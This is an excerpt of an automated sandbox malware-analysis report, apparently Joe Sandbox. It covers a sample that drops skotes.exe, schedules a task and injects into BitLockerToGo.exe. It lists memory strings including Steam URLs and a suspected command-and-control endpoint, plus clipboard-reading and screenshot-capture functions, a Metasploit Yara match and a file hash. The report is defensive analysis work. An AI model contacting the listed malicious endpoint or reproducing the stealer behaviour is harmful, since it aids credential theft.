Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/5
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/_
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599072689.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.000000000075C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2597803084.000000000075C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamloopback.host
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: BitLockerToGo.exe, 0000000A.00000002.2598698443.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: BitLockerToGo.exe, 0000000A.00000002.2598698443.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2595123958.0000000000731000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599072689.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 0000000A.00000002.2597803084.0000000000744000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.0000000000744000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://suggestyuoz.biz/api
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589909504.000000000073C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2589773718.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: BitLockerToGo.exe, 0000000A.00000003.2590557844.0000000000792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000003.2590983717.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000A.00000002.2599015369.00000000007A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49943 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00686F10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 10_2_00686F10
Contains functionality to read the clipboard data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00686F10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 10_2_00686F10
Contains functionality to record screenshots
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006870C0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 10_2_006870C0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.2577492519.000000000A010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
PE file contains section with special chars
Source: dFVyelEPsf.exe Static PE information: section name:
Source: dFVyelEPsf.exe Static PE information: section name: .idata
Source: dFVyelEPsf.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 8dcfe9a593.exe.6.dr Static PE information: section name:
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: .idata
Source: 8dcfe9a593.exe.6.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00B9E530 6_2_00B9E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BD78BB 6_2_00BD78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BD8860 6_2_00BD8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BD7049 6_2_00BD7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BD31A8 6_2_00BD31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00B94DE0 6_2_00B94DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BD2D10 6_2_00BD2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BD779B 6_2_00BD779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00B94B30 6_2_00B94B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BC7F36 6_2_00BC7F36
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065B28B 10_2_0065B28B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065ABC0 10_2_0065ABC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00658380 10_2_00658380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00657060 10_2_00657060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067B062 10_2_0067B062
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00662820 10_2_00662820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067F02B 10_2_0067F02B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068F030 10_2_0068F030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00693810 10_2_00693810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067C0E0 10_2_0067C0E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006820E7 10_2_006820E7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066E8C0 10_2_0066E8C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006548A0 10_2_006548A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00691968 10_2_00691968
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067F169 10_2_0067F169
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068B170 10_2_0068B170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068994A 10_2_0068994A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00676940 10_2_00676940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00673150 10_2_00673150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00668936 10_2_00668936
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00678133 10_2_00678133
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067B932 10_2_0067B932
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066B930 10_2_0066B930
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066C10F 10_2_0066C10F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006839F5 10_2_006839F5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068C9D0 10_2_0068C9D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006611BE 10_2_006611BE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067F1BC 10_2_0067F1BC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068D180 10_2_0068D180
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067A196 10_2_0067A196
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00684990 10_2_00684990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065CA70 10_2_0065CA70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00670240 10_2_00670240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00693240 10_2_00693240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00655A50 10_2_00655A50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00686A50 10_2_00686A50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068BA30 10_2_0068BA30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00671A00 10_2_00671A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068FA10 10_2_0068FA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00667A1D 10_2_00667A1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066DAF0 10_2_0066DAF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006792F0 10_2_006792F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006792D0 10_2_006792D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006922B0 10_2_006922B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00656280 10_2_00656280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066EB50 10_2_0066EB50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00672330 10_2_00672330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067F33D 10_2_0067F33D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006593E0 10_2_006593E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066CBE0 10_2_0066CBE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00672BC0 10_2_00672BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00676BD0 10_2_00676BD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068B3D0 10_2_0068B3D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006763A3 10_2_006763A3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00685BAC 10_2_00685BAC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00652BA0 10_2_00652BA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068D3AE 10_2_0068D3AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006923A0 10_2_006923A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00667468 10_2_00667468
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066247D 10_2_0066247D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00679425 10_2_00679425
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066A4C0 10_2_0066A4C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065D481 10_2_0065D481
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00665C83 10_2_00665C83
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066E480 10_2_0066E480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00678490 10_2_00678490
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065F560 10_2_0065F560
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066756C 10_2_0066756C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00680D70 10_2_00680D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00676D7A 10_2_00676D7A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067F545 10_2_0067F545
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065DD4B 10_2_0065DD4B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00692550 10_2_00692550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00693500 10_2_00693500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00686D10 10_2_00686D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00682514 10_2_00682514
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006925E0 10_2_006925E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00655DF0 10_2_00655DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0065EDF2 10_2_0065EDF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068F5C0 10_2_0068F5C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006535B0 10_2_006535B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00661DBE 10_2_00661DBE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00655590 10_2_00655590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067F02B 10_2_0067F02B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00692670 10_2_00692670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066B620 10_2_0066B620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0066DE29 10_2_0066DE29
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068BE10 10_2_0068BE10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068C6E0 10_2_0068C6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006756F4 10_2_006756F4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006846F0 10_2_006846F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00692ED0 10_2_00692ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00689E9A 10_2_00689E9A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00653F60 10_2_00653F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00678F40 10_2_00678F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0067A732 10_2_0067A732
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00658F30 10_2_00658F30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00657F00 10_2_00657F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_0068A713 10_2_0068A713
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006667FF 10_2_006667FF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006787C0 10_2_006787C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_006527D0 10_2_006527D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00668FAD 10_2_00668FAD
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe 0513F12C182A105759497D8280F1C06800A8FF07E1D69341268F3C08ECC27C6D
Found potential string decryption / allocating functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 00657BF0 appears 44 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 00664C80 appears 109 times
PE file overlay found
Source: 8dcfe9a593.exe.6.dr Static PE information: Data appended to the last section found
Source: random[1].exe0.6.dr Static PE information: Data appended to the last section found
Uses 32bit PE files
Source: dFVyelEPsf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
